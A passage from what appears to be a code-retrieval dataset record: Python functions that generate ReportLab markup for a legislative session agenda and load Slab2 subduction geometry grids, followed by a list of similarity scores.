spaceAfter=\"12\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n\n\n #inicio do bloco que contem os flowables\n \n for dic in lst_pauta:\n #espaco inicial\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"10\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n\n #condicao para a quebra de pagina\n tmp+='\\t\\t<condPageBreak height=\"5mm\"/>\\n'\n\n #pauta\n if dic['num_ordem']!=None:\n tmp+='\\t\\t<para style=\"P4\"><font color=\"#222\"><b>Item nº ' + str(dic['num_ordem']) + '</b></font></para>\\n'\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"4\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n if dic['id_materia']!=None:\n if dic['cod_materia']!='':\n tmp+='\\t\\t<para style=\"P4\"><b><font color=\"#126e90\"><u>' + dic['link_materia']+'</u></font> - '+ dic['nom_autor'] + '</b></para>\\n'\n if dic['cod_parecer']!='': \n tmp+='\\t\\t<para style=\"P4\"><b><font color=\"#126e90\"><u>' + dic['link_materia']+'</u></font> - '+ dic['nom_autor'] + ', que '+ dic['txt_materia'] + '</b></para>\\n'\n tmp+='\\t\\t<para style=\"P3\" spaceAfter=\"4\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n if dic['txt_ementa']!=None:\n tmp+='\\t\\t<para style=\"P3\">' + dic['txt_ementa'].replace('&','&amp;') + '</para>\\n'\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"4\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n\n if dic['des_turno']!='':\n tmp+='\\t\\t<para style=\"P3\"><b>Turno</b>: '+ dic['des_turno'] +' | <b>Quorum</b>: '+ dic['des_quorum']+' | <b>Tipo de Votação</b>: '+ dic['tip_votacao'] + '' + '</para>\\n'\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"8\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n\n if dic['parecer']!= 0 and dic['parecer']!= '':\n tmp+='\\t\\t<para style=\"P3\"><b><u>PARECERES:</u></b></para>\\n\\n'\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"4\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n for item in dic['pareceres']:\n tmp+='\\t\\t<para style=\"P3\"><b><font color=\"#126e90\">' + item[\"link_materia\"] + '</font> - ' + item[\"conclusao\"] + '</b> ' + item[\"relatoria\"] + '</para>\\n'\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"4\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n\n if dic['substitutivo']!= 0 and 
dic['substitutivo']!= '':\n tmp+='\\t\\t<para style=\"P3\"><b><u>SUBSTITUTIVOS:</u></b></para>\\n\\n'\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"4\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n' \n for substitutivo in dic['substitutivos']:\n tmp+='\\t\\t<para style=\"P3\"><b><font color=\"#126e90\">' + substitutivo[\"id_substitutivo\"] + '</font> - ' + substitutivo[\"autoria\"] + '</b> - ' + substitutivo[\"txt_ementa\"] + '</para>\\n'\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"4\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n\n if dic['emenda']!= 0 and dic['emenda']!= '':\n tmp+='\\t\\t<para style=\"P3\"><b><u>EMENDAS:</u></b></para>\\n\\n'\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"4\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n' \n for emenda in dic['emendas']:\n tmp+='\\t\\t<para style=\"P3\"><b><font color=\"#126e90\">' + emenda[\"id_emenda\"] + '</font> - ' + emenda[\"autoria\"] + '</b> - ' + emenda[\"txt_ementa\"] + '</para>\\n'\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"4\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n return tmp", "def carga_datos_slab2( directorio, latini, latfin, cambiarnan = True ):\n\n # se chequea si el input directorio es o no string\n if not isinstance( directorio, basestring ) :\n directorio = str(directorio)\n else:\n directorio = directorio\n\n # se chequea el formateo del string (se desea que no termine con /)\n if not directorio.endswith(\"/\"):\n directorio = directorio + \"/\"\n\n\n # archivo de profundidad\n proffile = directorio + \"sam_slab2_dep_02.23.18.xyz\" # nombre del archivo de prof\n slabprof = np.genfromtxt(proffile, delimiter = \",\") # se lee el archivo a un array\n # archivo de dip\n dipfile = directorio + \"sam_slab2_dip_02.23.18.xyz\" # nombre del archivo de dip\n slabdip = np.genfromtxt(dipfile, delimiter = \",\") # se lee el archivo a un array\n # archivo de strike\n strfile = directorio + \"sam_slab2_str_02.23.18.xyz\"\n slabstrike = np.genfromtxt(strfile, delimiter = \",\") # se lee el archivo a un array\n\n # las longitudes estan en formato 0 - 360, se cambian a -180 - 180\n slabprof[:,0] = slabprof[:,0] - 360\n slabdip[:,0] = slabdip[:,0] - 360\n slabstrike[:,0] = slabstrike[:,0] - 360\n\n # se cambia dimensiones de los array para graficar\n repslat = col.Counter( slabprof[:,1] ).values( )[0] # (n cols) formato xyz repite valores de latitud para cada longitud, se obtiene cuantas veces se repite este valor para reshape\n repslon = len( slabprof )/repslat # (n filas)\n\n lon = np.reshape( slabprof[:,0], ( repslon, repslat ) )\n lat = np.reshape( slabprof[:,1], ( repslon, repslat ) )\n prof = np.reshape( slabprof[:,2], ( repslon, repslat ) ) * -1\n dip = np.reshape( slabdip[:,2], ( repslon, repslat ) )\n strike = np.reshape( slabstrike[:,2], ( repslon, repslat ) )\n\n idx = ( lat <= latini ) & ( lat >= latfin ) # indices de las latitudes dentro del area de interes\n # numero de columnas se mantiene (repslat), disminuye solo numero de filas (repslon)\n lon_adi = lon[idx] # adi: area de interes\n lat_adi = lat[idx]\n prof_adi = prof[idx]\n dip_adi = dip[idx]\n strike_adi = strike[idx]\n\n #idx_lonini = np.where(lon[0,] == lonini)[0][0]\n #idx_lonfin = np.where(lon[0,] == lonfin)[0][0]\n\n # redimensionar arrays\n filas = len(lat_adi)/repslat # cantidad de filas en array cortado nuevo\n lon = np.reshape( lon_adi, ( filas, repslat ) )\n lat = np.reshape( lat_adi, ( filas, 
repslat ) )\n prof = np.reshape( prof_adi, ( filas, repslat ) ) * 1000\n dip = np.reshape( dip_adi, ( filas, repslat ) )\n strike = np.reshape( strike_adi, ( filas, repslat ) )\n\n # si se desea se puede cambiar los valores nan por 0\n if cambiarnan:\n prof[ np.isnan( prof ) ] = 0\n dip[ np.isnan( dip ) ] = 0\n strike[ np.isnan( strike ) ] = 0\n\n # se debe revisar que la profundidad este en metros\n if prof.max( ) < 1000 :\n prof *= 1000\n\n return lon, lat, prof, dip, strike, repslat, repslon" ]
[ "0.58442247", "0.5648824", "0.56434804", "0.56288433", "0.5588605", "0.5584497", "0.5554773", "0.5449711", "0.54150164", "0.53789884", "0.5370985", "0.532739", "0.53188556", "0.5307319", "0.52647316", "0.51832354", "0.51682794", "0.51462793", "0.51443756", "0.51443756", "0.51443756", "0.51443756", "0.51443756", "0.5140873", "0.51317626", "0.51271486", "0.5119429", "0.5099722", "0.5092418", "0.5089064", "0.5079697", "0.5070909", "0.5063762", "0.5053209", "0.5047713", "0.50371736", "0.5035778", "0.5032324", "0.5014526", "0.5014362", "0.5008312", "0.49985367", "0.4990685", "0.49764657", "0.49665862", "0.4954783", "0.4951041", "0.49411684", "0.4937337", "0.4935545", "0.4915884", "0.49001852", "0.48991656", "0.48986292", "0.4896145", "0.48890153", "0.48855966", "0.48823303", "0.48796538", "0.48618495", "0.48390275", "0.48347732", "0.48347732", "0.48305646", "0.4827028", "0.48217514", "0.48101684", "0.480071", "0.4798712", "0.4798712", "0.47983843", "0.47959468", "0.47943637", "0.47861585", "0.47832736", "0.4781864", "0.4778959", "0.477604", "0.47721413", "0.47657523", "0.47636703", "0.47569275", "0.47549555", "0.4754031", "0.47538745", "0.47536027", "0.47486937", "0.47470778", "0.47463667", "0.47419208", "0.4730562", "0.47287452", "0.47273082", "0.47249076", "0.47219202", "0.47216737", "0.47203082", "0.47195938", "0.47156942", "0.4712588" ]
0.59360135
0
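The document in the record above extracts a database value one character at a time with time-based blind SQL injection: for each position it binary-searches the character's code point by sending `ORD(MID((SELECT ...),pos,1)) = mid` and `> mid` probes tied to `SLEEP(timeToWait)`, and treats a response slower than `timeToWait` as a "yes" (each slow response is re-sent once to filter timing noise). Stripped of the HTTP and SQL plumbing, the core is an ordinary binary search over a boolean oracle. A minimal, self-contained sketch of that algorithm follows; `SECRET`, `oracle_equal`, `oracle_greater`, and the function names are illustrative stand-ins for the timed POST requests, not part of the original tool:

```python
SECRET = "admin_pw"  # stand-in for the database value the tool extracts

def oracle_equal(index, mid):
    """Boolean oracle: is ord(SECRET[index]) == mid?

    In the tool this is the payload `... ORD(MID((SELECT ...),index,1)) = mid
    AND SLEEP(t)`; a response slower than timeToWait means True.
    """
    return index < len(SECRET) and ord(SECRET[index]) == mid

def oracle_greater(index, mid):
    """Boolean oracle: is ord(SECRET[index]) > mid? (the `> mid` payload)"""
    return index < len(SECRET) and ord(SECRET[index]) > mid

def extract_char(index, lo=32, hi=126):
    """Binary-search one character's code point over printable ASCII."""
    while lo <= hi:
        mid = lo + (hi - lo) // 2
        if oracle_equal(index, mid):
            return chr(mid)        # character found
        if oracle_greater(index, mid):
            lo = mid + 1           # hidden code is in the upper half
        else:
            hi = mid - 1           # hidden code is in the lower half
    return None                    # range exhausted: past the end of the value

def extract_string(max_len=64):
    out = []
    for i in range(max_len):
        ch = extract_char(i)
        if ch is None:
            break
        out.append(ch)
    return "".join(out)

print(extract_string())  # -> admin_pw
```

A design note: the tool spends two probes per step (an `=` check, then a `>` check, each confirmed by a repeat request), so it costs roughly four timed requests per bisection step; a `>`-only search converging with `while lo < hi` would answer with about half the probes, at the price of losing the early exit when the `=` probe happens to hit.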
Push an element onto the stack
def apilar(pila, dato): pila.tope += 1 pila.datos[pila.tope] = dato
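The document implements push as `tope += 1` followed by a write into a preallocated `datos` array, i.e. a fixed-capacity stack where `tope` indexes the top element. For context, a minimal sketch of the structure this convention implies; the `Pila` class, the overflow guard, `pila_vacia`, and `desapilar` are assumptions filled in around the record's own `apilar` and the `cima` accessor that appears among the negatives below:

```python
class Pila:
    """Fixed-capacity stack backed by a preallocated list.

    `tope` is the index of the top element; -1 means the stack is empty.
    """
    def __init__(self, capacidad=100):
        self.datos = [None] * capacidad
        self.tope = -1

def pila_vacia(pila):
    return pila.tope == -1

def apilar(pila, dato):
    """Push: the document's two lines, plus an overflow guard (assumed)."""
    if pila.tope + 1 >= len(pila.datos):
        raise OverflowError("pila llena")
    pila.tope += 1
    pila.datos[pila.tope] = dato

def cima(pila):
    """Top element; same access pattern as the `cima` negative below."""
    return pila.datos[pila.tope]

def desapilar(pila):
    """Pop: return the top element and decrement `tope`."""
    dato = pila.datos[pila.tope]
    pila.datos[pila.tope] = None   # drop the reference
    pila.tope -= 1
    return dato

# usage
p = Pila()
apilar(p, 42)
assert cima(p) == 42 and desapilar(p) == 42 and pila_vacia(p)
```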
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def init_podataka_sa_REST(self):\n urlUredjaj = self.cfg.get_konfig_element('REST', 'uredjaj')\n listaUredjaja = helper_funkcije.get_uredjaje_sa_REST(urlUredjaj)\n #inicijalizacija svih dostupnih uredjaja\n if listaUredjaja:\n for uredjaj in listaUredjaja:\n UNIT = Uredjaj(serial=uredjaj)\n tekst = helper_funkcije.get_podatke_za_uredjaj_sa_REST(urlUredjaj, uredjaj)\n #ako postoje podaci za uredjaj\n if tekst:\n try:\n root = ET.fromstring(tekst)\n #OSNOVNI PODACI UREDJAJA\n try:\n lokacija = helper_funkcije.get_lokaciju_uredjaja(urlUredjaj, uredjaj)\n UNIT.set_lokacija(lokacija)\n self.add_postaju(lokacija)\n except Exception:\n pass\n try:\n proizvodjac = root.find('modelUredjajaId/proizvodjacId/naziv').text\n UNIT.set_proizvodjac(proizvodjac)\n except Exception:\n pass\n try:\n oznakaModela = root.find('modelUredjajaId/oznakaModela').text\n UNIT.set_oznakaModela(oznakaModela)\n except Exception:\n pass\n #ANALITICKA METODA\n METODA = AnalitickaMetoda()\n try:\n ID = root.find('./modelUredjajaId/analitickeMetodeId/id').text\n METODA.set_ID(ID)\n except Exception:\n pass\n try:\n norma = root.find('./modelUredjajaId/analitickeMetodeId/norma').text\n METODA.set_norma(norma)\n except Exception:\n pass\n try:\n naziv = root.find('./modelUredjajaId/analitickeMetodeId/naziv').text\n METODA.set_naziv(naziv)\n except Exception:\n pass\n #elementi za racunanje...(Srz, Srs, rz, rmax...)\n try:\n metode = root.find('./modelUredjajaId/analitickeMetodeId')\n for granica in metode.findall('dozvoljeneGraniceCollection'):\n try:\n oznaka = granica.find('./ispitneVelicine/oznaka').text\n value = granica.find('max').text\n if oznaka == 'o':\n METODA.set_o(value)\n #pokusaj dolaska do mjerne jedinice\n jedinica = granica.find('./mjerneJediniceId/oznaka').text\n jedinica = helper_funkcije.adapt_mjernu_jedinicu(jedinica)\n METODA.set_jedinica(jedinica)\n elif oznaka == 'Ec':\n #za efikasnost konvertera treba i min granica\n METODA.set_Ec_max(value)\n minvalue = granica.find('min').text\n METODA.set_Ec_min(minvalue)\n else:\n METODA.set_member[oznaka](value)\n except Exception:\n pass\n except Exception:\n pass\n #ako metoda ne postoji na popisu... 
dodaj ju\n self.set_novu_analiticku_metodu(ID, METODA)\n #postavi analiticku metodu u uredjaj\n UNIT.set_analitickaMetoda(METODA)\n #KOMPONENTE UREDJAJA\n try:\n komponente = root.find('modelUredjajaId')\n for komponenta in komponente.findall('komponentaCollection'):\n KOMPONENTA = Komponenta()\n try:\n formula = komponenta.find('formula').text\n KOMPONENTA.set_formula(formula)\n naziv = komponenta.find('naziv').text\n KOMPONENTA.set_naziv(naziv)\n mjernaJedinica = komponenta.find('./mjerneJediniceId/oznaka').text\n mjernaJedinica = helper_funkcije.adapt_mjernu_jedinicu(mjernaJedinica)\n KOMPONENTA.set_jedinica(mjernaJedinica)\n kv = komponenta.find('konvVUM').text\n KOMPONENTA.set_kv(kv)\n #dodaj komponentu u mapu\n self.set_novu_komponentu(formula, KOMPONENTA)\n #dodaj komponentu u uredjaj\n UNIT.dodaj_komponentu(KOMPONENTA)\n except Exception:\n pass\n except Exception:\n pass\n #postavi uredjaj u mapu sa serijskim uredjajima\n self.dodaj_uredjaj(uredjaj, UNIT)\n except Exception as err:\n logging.warning(str(err))\n self.create_local_cache()\n else:\n self.load_local_cache()", "def get(self, el):\n raise Exception('TODO IMPLEMENT ME !')", "def test_recupera_un_solo_elemento(self):\n detalle = reverse(\"musica:detail\", kwargs={\"pk\": self.musica1.id})\n respuesta = self.client.get(detalle)\n # print(respuesta.data['id'])\n self.assertEqual(200, respuesta.status_code)\n valor_consulta = Musica.objects.get(id=respuesta.data[\"id\"])\n # print(valor_consulta)\n self.assertEqual(respuesta.data[\"cancion\"], valor_consulta.cancion)\n self.assertEqual(respuesta.data[\"artista\"], valor_consulta.artista)\n self.assertEqual(respuesta.data[\"año\"], str(valor_consulta.año))", "def get(self, obj):", "def getById(self, id):\r\n try:\r\n c = self.conn.cursor()\r\n c.execute(\"SELECT * FROM Ksiazka WHERE id=?\", (id,))\r\n wpis_row = c.fetchone()\r\n ksiazka = Ksiazka(id=id)\r\n if wpis_row == None:\r\n ksiazka=None\r\n else:\r\n ksiazka.date = wpis_row[1]\r\n c.execute(\"SELECT * FROM Wpisy WHERE ksiazka_id=? 
order by name\", (id,))\r\n wpis_items_rows = c.fetchall()\r\n items_list = []\r\n for item_row in wpis_items_rows:\r\n item = WpisItem(name=item_row[0], nazwisko=item_row[1], numer=item_row[2], ulica=item_row[3], nrdomu=item_row[4], nrmieszkania=item_row[5], miasto=item_row[6])\r\n items_list.append(item)\r\n ksiazka.wpisy=items_list\r\n except Exception as e:\r\n #print \"ksiazka getById error:\", e\r\n raise RepositoryException('error getting by id ksiazka_id: %s' % str(id))\r\n return ksiazka", "def get_obj():\n idPadre = request.args.get('id')\n nombrePadre = nombreObjeto(idPadre)\n global variablesActualizables\n variablesActualizables = -1\n print(\"consulta objetos id: {}, padre: {}\".format(idPadre,nombrePadre))\n\n try:\n objetos = g.db.query(Objetos).filter_by(NombreObjetoPadreObjeto=nombrePadre).filter_by(Activo=True).all()\n except NoResultFound:\n print \"NO resultados para el padre {}\".format(nombrePadre)\n objetos = []\n\n try:\n funciones = g.db.query(Funciones).filter_by(NombreObjetoPadreFuncion=idPadre).all()\n except NoResultFound:\n print \"NO funciones para el padre {}\".format(nombrePadre)\n funciones = []\n\n try:\n variables = g.db.query(Variables).filter_by(NombreObjetoPadreVariable=idPadre).all()\n except NoResultFound:\n print \"NO variables para el padre {}\".format(nombrePadre)\n variables = []\n if nombrePadre != None:\n Padre=\"Elementos de {}\".format(nombrePadre)\n else:\n Padre=\"Objetos Activos\"\n return render_template('show_objects.html',padre=Padre, objetos=objetos, funciones=funciones, variables=variables)", "def getVotacion(self, url):", "def updatePeliculas():\n\txml_ciudades = \"http://api2.cinemex.com/rsvr.php?Action=GetFiltrados&IdDev=1\"\n\txml_peliculas = \"http://api2.cinemex.com/rsvr.php?Action=GetFiltrados&IdDev=1&ciudad=%s&byciudad=1\" #id_ciudad\n \n\tciudades = parse_ciudades( urlopen(url_movil) ) \n\t\n\t\n\tbase_url_pelicula = \"http://www.cinemex.com/cartelera/pelicula.php?vcode=%s\" #mex_vc\n\tpeliculas = {}\n \n\tpelis_obj = [] #Contiene toda la info de las peliculas, titulo, sinopsis, etc\n \n\t#Crea un diccionario con el vc y el objeto de la pelicula\n\t#De esta forma no hay peliculas repetidas\n\tfor ciudad_id in ciudades:\n\t\txml_url = xml_peliculas % ciudad_id\n\t\ttry:\n\t\t\txml = urlopen(xml_url)\n\t\texcept:\n\t\t\tlogger.debug( 'error cargando pagina %s' % xml_url)\n\t\t\tcontinue\n\t\tpelis_actual = parse_peliculas(xml)\n\t\t#Agregar las peliculas q no estan todavia\n\t\tfor peli in pelis_actual:\n\t\t\tkey = peli.get('mex_vc', '')\n\t\t\tif key not in peliculas: peliculas[key] = peli\n \n\tfor k, v in peliculas.items():\n\t\turl = base_url_pelicula % k\n\t\thtml = urlopen(url)\n\t\tpelis_obj.append(scrape_pelicula(html, v))\n \n\tfor peli in pelis_obj:\n\t\tcreatePelicula(peli)", "def Item(self) -> object:", "def Item(self) -> object:", "def get_data(self):", "def agregar_bolsa(self, letra, cantidad):", "def scraper_voto(self):\n\n #per trovare il link a fantacalcio.it devo prima trovare il link della squadra e trovare il suo nome\n soup_rosa = BeautifulSoup(\n requests.get(f\"{self.LINK_FANTACALCIO_IT}/{self.team}#rosa\").text,\n \"html.parser\",\n )\n print(self.name)\n\n displayed_name = self.name\n if displayed_name == \"Coulibaly\": # caso estremo, il sito si confonde\n displayed_name = \"Coulibaly M.\"\n\n # trovo il link personale del giocatore e glielo assegno\n link = soup_rosa.find(\"a\", text=displayed_name.upper())[\"href\"]\n self.scheda_giocatore = link\n\n # leggo voto e media voto\n soup = 
BeautifulSoup(requests.get(link).text, \"html.parser\")\n\n self.media_voto = float(soup.find_all(class_=\"nbig2\")[0].text.replace(\",\", \".\"))\n self.media_fantavoto = float(\n soup.find_all(class_=\"nbig2\")[1].text.replace(\",\", \".\")\n )\n\n # leggo anche il ruolodalla schedina delle info\n infos = soup.find_all(class_=\"col-lg-6 col-md-6 col-sm-12 col-xs-12\")[-2]\n self.ruolo = str(infos.find(\"span\").text)\n\n # compilo i dati: partite, gol e assist\n dati_partite = soup.find_all(class_=\"nbig\")\n\n partite = \"🥅 \" + dati_partite[0].text\n # i portieri hanno statistiche diverse!\n if self.ruolo == \"P\":\n goal = \"❌ \" + dati_partite[1].text\n self.dati = \"<br>\".join([partite, goal])\n else:\n goal = \"⚽ \" + dati_partite[1].text\n assist = \"👟 \" + dati_partite[2].text\n self.dati = \"<br>\".join([partite, goal, assist])\n\n # aggiungo stellina al nome se hanno una bella media voto\n if self.media_fantavoto > 7:\n self.name += \" ⭐\"", "def mezclar_bolsa(self):", "def get(self, _id):", "def __str__(self):\n return self.idBaixasPagar", "def get(self, request, **kwargs):\n elementos_list = Elementos.objects.all()\n return render(request, 'alchemy/mezclar.html', {'elementos_list' : elementos_list})", "def ListaDeCarrerasAPI(request):\n if request.method == 'GET':\n carreras = Carrera.objects.all()\n serializer = CarreraSerializer(carreras, many=True)\n return Response(serializer.data)\n\n elif request.method == 'POST':\n serializer = CarreraSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)", "def get_by_id(id, lista):\n for inventar in lista:\n if get_id(inventar) == id:\n return inventar\n return None", "def data(self):", "def elems(self):", "def fetch_data(self):", "def items(self):", "def cargar_atril(self,lista,bolsa):\n self.atril = lista\n self.bolsa = bolsa", "def cargar_bolsa(self,lista):\n self.bolsa = lista", "def VIEJOupdateComplejos():\n\txml_ciudades = \"http://api2.cinemex.com/rsvr.php?Action=GetFiltrados&IdDev=1\"\n\txml_complejos = \"http://api2.cinemex.com/rsvr.php?Action=GetFiltrados&IdDev=1&ciudad=%s\"\n\t\n\t\n\tciudades = parse_ciudadesxml( urlopen(xml_ciudades) )#Diccionario de ciudades de Mexico\n\t\n\t#xml = urlopen(xml_complejos)\n\t#ids = parse_complejosxml(xml)\n\t\n\tbase_url = \"http://www.cinemex.com/cinemex/complejos.php?cvecine=%s\"\n\t\n\tfor ciudad_id in ciudades:\n\t\txml_url = xml_complejos % ciudad_id\n\t\tcomplejos_xml = urlopen(xml_url)\n\t\tcomplejos = parse_complejosxml(complejos_xml)\n\t\tfor comp in complejos:\n\t\t\turl = base_url % comp['id_org']\n\t\t\tcomp_html = urlopen(url)\n\t\t\tcomplejo, platino = scrape_compInfo(comp_html,comp)\n\t\t\t#logger.debug( complejo['id_org'])\n\t\t\tcomplejo['id_ciudad']= ciudad_id\n\t\t\t#createComplejo(complejo)\n\t\t\tlogger.debug( complejo)\n\t\t\tlogger.debug( platino)\n\t\t\t#if platino: createComplejoPlatino(complejo)", "def getFieldValue(self, field, no_html=False, external_id=True, depth=1, optimize=False):\n if field[\"type\"] == \"category\":\n if field[\"config\"][\"settings\"][\"multiple\"]:\n values = []\n for category in field[\"values\"]:\n values.append(category[\"value\"][\"text\"])\n return values\n else:\n return field[\"values\"][0][\"value\"][\"text\"]\n elif field[\"type\"] == \"image\":\n values = []\n for image in field['values']:\n values.append([image[\"value\"][\"mimetype\"], 
image[\"value\"][\"file_id\"]])\n return values\n elif field[\"type\"] == \"date\":\n return field[\"values\"][0]\n elif field[\"type\"] == \"app\":\n itemID = field[\"values\"][0][\"value\"][\"item_id\"]\n appID = field[\"values\"][0][\"value\"][\"app\"][\"app_id\"]\n if depth<=0:\n return itemID\n else:\n if optimize:#Si es necesario optimizar la carga del item\n try: #Intenta buscar la lista de items como un atributo en self\n items = getattr(self, str(appID))\n except AttributeError:\n #Como no los encontró, crea una nueva PodioAPI con la appID de destino y le pide los items\n if self.client:\n nested_api = self\n else:\n try:\n nested_api = self.__class__(appID)\n except: #TODO: Especificar la excepcion que es de tipo \"DoesNotExist\"\n raise Exception(\"Hubo un error creando el nuevo objeto 'PodioApi' para el item relacionado con app_id %s. Por favor agregar el app_id y el app_token de esa aplicacion a la base de datos\" % appID)\n items = nested_api.get_filtered_items(None, depth=depth-1)\n #Luego crea el atributo para que esta llamada no se repita\n setattr(self, str(appID), items)\n #Ya teniendo a todos los items, busca entre la lista aquel cuya ID es igual al item ID de la referencia, y lo pone como valor del campo.\n item = None\n for i in items:\n if i[\"item\"] == int(itemID):\n item = i\n\n else:\n data = self._client.Item.find(int(itemID))\n if not external_id:\n item = self.make_dict(data, external_id=external_id, depth=depth-1)\n else:\n item = self.makeDict(data, nested=True)\n return item\n elif field[\"type\"] == \"text\":\n text = field[\"values\"][0][\"value\"]\n if no_html and field[\"config\"][\"settings\"][\"format\"] == 'html':\n print (text.encode('utf-8'))\n html_text = BeautifulSoup(text, \"html5lib\")\n for p_tag in html_text.find_all('p'):\n p_tag.unwrap()\n for br_tag in html_text.find_all('br'):\n br_tag.name=\"text:line-break\"\n html_text.find('html').unwrap()\n html_text.find('head').unwrap()\n html_text.find('body').unwrap()\n text = unicode(html_text)\n #text = strip_tags(text)\n return text\n elif field[\"type\"] == \"embed\":\n return field[\"values\"][0][\"embed\"][\"url\"]\n else:\n #print field[\"type\"]\n return field[\"values\"][0][\"value\"]", "def get_first_item(self):\n params = urllib.parse.urlencode({'o':'1', 'q':self.query})\n url = 'https://www.leboncoin.fr/annonces/offres/ile_de_france/?{:s}'.format(params) # Cree l'url de recherche en get\n html = urllib.request.urlopen(url)\n if url != html.geturl():\n return None\n soup = BeautifulSoup.BeautifulSoup(html, 'html5lib')\n try:\n products = soup.section.find_all('a', 'list_item clearfix trackable')\n except Exception as e:\n print('Nothing found on leboncoin')\n return None\n for product in products: # recupere les differentes informations de chaque produit\n if str(product.section.h2).strip() == 'None':\n continue\n name = product.section.h2.contents[0].strip()\n price = self.__get_price(product)\n link = 'http:' + product['href']\n return (name, price, link)\n return None", "def get_details(self):", "def __init__(self, lista_enlazada): \n\t\tself.lista = lista_enlazada\n\t\tself.anterior = None\n\t\tself.actual = lista_enlazada.prim\n\t\tself.pila_anteriores = Pila()\n\t\tself.posicion = 0", "def __init__(self, nombre_depto, id_depto):\n self.nombre_depto = nombre_depto\n self.id_depto = id_depto\n self.empleados = []", "def apilar(self,dato):\r\n\t\tself.elementos.append(dato)\r\n\t\tself.len += 1", "def list(self):", "def ustal_kon(self, f):\n kon= 
Kon.objects.using(settings.DBS(self.firma)).filter(id= f.nip_nabywcy)\n if kon:\n return kon[0]\n \n kon= Kon()\n \n # Numer dla zagranicznego\n nr_kon= Kon.objects.using(settings.DBS(self.firma)).exclude(nr_kon__startswith= 'Z').aggregate(Max('nr_kon'))\n kon.nr_kon= '{:05d}'.format(int(nr_kon['nr_kon__max'].strip())+1)\n\n if '/' in f.nazwa_nabywcy:\n kon.skrot, kon.nazwa= f.nazwa_nabywcy.split('/')\n else:\n kon.nazwa= f.nazwa_nabywcy\n \n kon.id= f.nip_nabywcy\n kon.idtyp= 'NIPUE' if re.match('[A-Z][A-Z]', f.nip_nabywcy) else 'NIP'\n kon.ulica, kon.kod, kon.miejsc= self.adres_kon(f.adres_nabywcy)\n \n kon.kraj= f.nip_nabywcy[:2] if re.match('[A-Z][A-Z]', f.nip_nabywcy) else 'PL'\n \n kon.id_obcy= f.id # zapamiętanie skąd się zwiął (faktura)\n \n kon.skrot= su(kon.skrot)\n kon.nazwa= su(kon.nazwa)\n kon.miejsc= su(kon.miejsc)\n kon.ulica= su(kon.ulica)\n \n kon.kiedy= datetime.date.today() # data utworzenia\n kon.data_us= kon.kiedy\n if f.termin_platnosci and f.data_wystawienia:\n kon.term_zap= (f.termin_platnosci - f.data_wystawienia).days\n \n kon.save(using= settings.DBS(self.firma))\n \n return kon", "def get_label():\r\n\r\n user = check_auth(request.headers, __name__)\r\n if user != True:\r\n return user\r\n user = authorize.get(request.headers.get('UserToken'))\r\n\r\n vozvrat = {}\r\n try:\r\n database = Database(config)\r\n except TypeError:\r\n vozvrat[\"messageError\"] = \"Нет подключения к БД\"\r\n return jsonify(vozvrat)\r\n\r\n vozvrat = []\r\n\r\n fields = [\r\n \"u.firstname\",\r\n \"u.lastname\",\r\n \"up.id\",\r\n \"up.name\",\r\n \"up.photo\",\r\n \"up.type\",\r\n \"up.method\",\r\n \"up.sale\",\r\n \"up.price\",\r\n \"c.name\",\r\n \"up.weight\",\r\n \"u2.name\",\r\n \"fp.id\",\r\n \"a.country\",\r\n \"a.city\",\r\n \"a.address\",\r\n \"a.lat\",\r\n \"a.lng\"\r\n ]\r\n\r\n query = sql.SQL(\"SELECT {} FROM users u \\\r\n RIGHT JOIN users_product up on u.id = up.user_id\\\r\n LEFT JOIN units u2 on up.unit_id = u2.id\\\r\n LEFT JOIN currencys c on up.currency_id = c.id\\\r\n LEFT JOIN favorit_products fp on u.id = fp.user_id\\\r\n LEFT JOIN address a on up.address_id = a.id\").format(\r\n sql.SQL(\",\").join(sql.Identifier(\r\n i.split('.')[0], i.split('.')[1]) for i in fields)\r\n )\r\n execute = database.select_data(query)\r\n if type(execute) != list:\r\n return execute\r\n\r\n data_append = {}\r\n for row in execute:\r\n for i in range(len(fields)):\r\n value = row[i]\r\n\r\n if fields[i] == \"up.id\":\r\n fields[i] = \"up.users_product_id\"\r\n if fields[i] == \"c.name\":\r\n fields[i] = \"c.currency\"\r\n if fields[i] == \"u2.name\":\r\n fields[i] = \"u2.unit\"\r\n if fields[i] == \"fp.id\":\r\n fields[i] = \"fp.is_favorit\"\r\n value = True if value != None else False\r\n\r\n data_append[fields[i].split('.')[1]] = value\r\n vozvrat.append(data_append)\r\n\r\n return jsonify(vozvrat)", "def 